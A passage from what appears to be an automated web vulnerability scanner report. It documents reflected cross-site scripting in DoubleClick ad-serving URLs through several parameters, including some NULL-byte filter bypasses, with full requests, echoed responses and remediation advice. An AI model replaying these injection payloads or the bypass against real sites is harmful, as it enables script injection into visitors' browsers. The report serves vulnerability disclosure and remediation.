GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!90f0b"-alert(1)-"64d1b9420e8&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 14:48:48 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6638
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... Schwab_AI_Q410_Webinar-Analysis_300x250.gif"; var minV = 8; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!90f0b"-alert(1)-"64d1b9420e8&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d9/%2a/m%3B234282360%3B0-0%3B0%3B58044029%3 ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50fe1'-alert(1)-'b07da9e25d was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=780525050fe1'-alert(1)-'b07da9e25d&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 30 Jan 2011 14:49:20 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6390
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Nov 01 17:12:22 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=780525050fe1'-alert(1)-'b07da9e25d&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dc/%2a/v%3B231464797%3B0-0%3B0%3B55598777%3B4307-300/ ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f557d"-alert(1)-"4d059799fd4 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=f557d"-alert(1)-"4d059799fd4&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 30 Jan 2011 14:49:16 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6211
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 17:25:10 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 2905/11HI_GENERAL_BACKUP_300x250.jpg"; var minV = 9; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=f557d"-alert(1)-"4d059799fd4&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d6/%2a/x%3B231464651%3B0-0%3B0%3B55598777%3B4307-300/ ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0092a16"-alert(1)-"41f375ff973 was submitted in the &PID parameter. This input was echoed as 92a16"-alert(1)-"41f375ff973 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250%0092a16"-alert(1)-"41f375ff973&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6187 Cache-Control: no-cache Pragma: no-cache Date: Sun, 30 Jan 2011 19:27:12 GMT Expires: Sun, 30 Jan 2011 19:27:12 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 21 21:09:29 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 905/10PR_SOLAR_300x250.jpg"; var minV = 8; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250%0092a16"-alert(1)-"41f375ff973&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/e0/%2a/h%3B231577755%3B1-0%3B0%3B55598777%3B4307-300/ ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 464a5'-alert(1)-'4eccc377927 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177464a5'-alert(1)-'4eccc377927&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 30 Jan 2011 14:50:31 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 540
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2bee4"-alert(1)-"2d6795c37b5 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=2bee4"-alert(1)-"2d6795c37b5&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 30 Jan 2011 14:50:26 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6199
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 17:25:10 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... g"; var minV = 9; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=2bee4"-alert(1)-"2d6795c37b5&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d3/%2a/x%3B231464651%3B0-0%3B0%3B55598777%3B4307-300/250%3B38973935/38991692/2%3B%3B%7Eokv% ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00a23f1"-alert(1)-"fdfe3d16e87 was submitted in the ASID parameter. This input was echoed as a23f1"-alert(1)-"fdfe3d16e87 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1%00a23f1"-alert(1)-"fdfe3d16e87&destination=;ord=1512704177? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6406 Cache-Control: no-cache Pragma: no-cache Date: Sun, 30 Jan 2011 19:28:40 GMT Expires: Sun, 30 Jan 2011 19:28:40 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Nov 01 17:12:22 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1%00a23f1"-alert(1)-"fdfe3d16e87&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/e0/%2a/v%3B231464797%3B0-0%3B0%3B55598777%3B4307-300/250%3B38973907/38991664/2%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp:/ ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0874'-alert(1)-'b0888e782fe was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1b0874'-alert(1)-'b0888e782fe&destination=;ord=1512704177? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 30 Jan 2011 14:50:57 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6394
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 28 17:44:31 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... et=\"_blank\" href=\"http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1b0874'-alert(1)-'b0888e782fe&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dd/%2a/l%3B235513126%3B1-0%3B0%3B55598777%3B4307-300/250%3B38973908/38991665/2%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp:/ ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1dc92'-alert(1)-'85dfa679d81 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV21dc92'-alert(1)-'85dfa679d81&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 30 Jan 2011 14:50:39 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6210
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 17:27:21 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV21dc92'-alert(1)-'85dfa679d81&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dd/%2a/m%3B231464693%3B0-0%3B0%3B55598777%3B4307-300/250%3B38973930/38991687/2%3B%3B%7Eokv%3D%3Bpc%3D ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00d3181"-alert(1)-"1701a13e520 was submitted in the TargetID parameter. This input was echoed as d3181"-alert(1)-"1701a13e520 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189%00d3181"-alert(1)-"1701a13e520&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6406 Cache-Control: no-cache Pragma: no-cache Date: Sun, 30 Jan 2011 19:27:47 GMT Expires: Sun, 30 Jan 2011 19:27:47 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Nov 01 17:12:22 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... pg"; var minV = 9; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189%00d3181"-alert(1)-"1701a13e520&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/e0/%2a/v%3B231464797%3B0-0%3B0%3B55598777%3B4307-300/250%3B38973907/38991664/ ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2489a'-alert(1)-'8542b43425 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=301991892489a'-alert(1)-'8542b43425&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 30 Jan 2011 14:50:18 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6235
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 17:25:10 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=301991892489a'-alert(1)-'8542b43425&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dc/%2a/x%3B231464651%3B0-0%3B0%3B55598777%3B4307-300/250%3B38973935/38991692/ ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49052"-alert(1)-"19cd9540b8a was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=3019918949052"-alert(1)-"19cd9540b8a&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 30 Jan 2011 14:50:14 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6398
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 28 19:09:32 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 0.jpg"; var minV = 9; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=3019918949052"-alert(1)-"19cd9540b8a&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dd/%2a/c%3B235513126%3B2-0%3B0%3B55598777%3B4307-300/250%3B39096156/39113913/ ...[SNIP]...
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00a3d12"-alert(1)-"36b734b7ab0 was submitted in the UIT parameter. This input was echoed as a3d12"-alert(1)-"36b734b7ab0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G%00a3d12"-alert(1)-"36b734b7ab0&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6340 Cache-Control: no-cache Pragma: no-cache Date: Sun, 30 Jan 2011 19:27:30 GMT Expires: Sun, 30 Jan 2011 19:27:30 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 28 17:42:12 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... PR_SOLAR_300x250.jpg"; var minV = 8; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G%00a3d12"-alert(1)-"36b734b7ab0&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/e0/%2a/q%3B231577755%3B0-0%3B0%3B55598777%3B4307-300/250%3B ...[SNIP]...
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 431e1'-alert(1)-'5bd123bb5c9 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
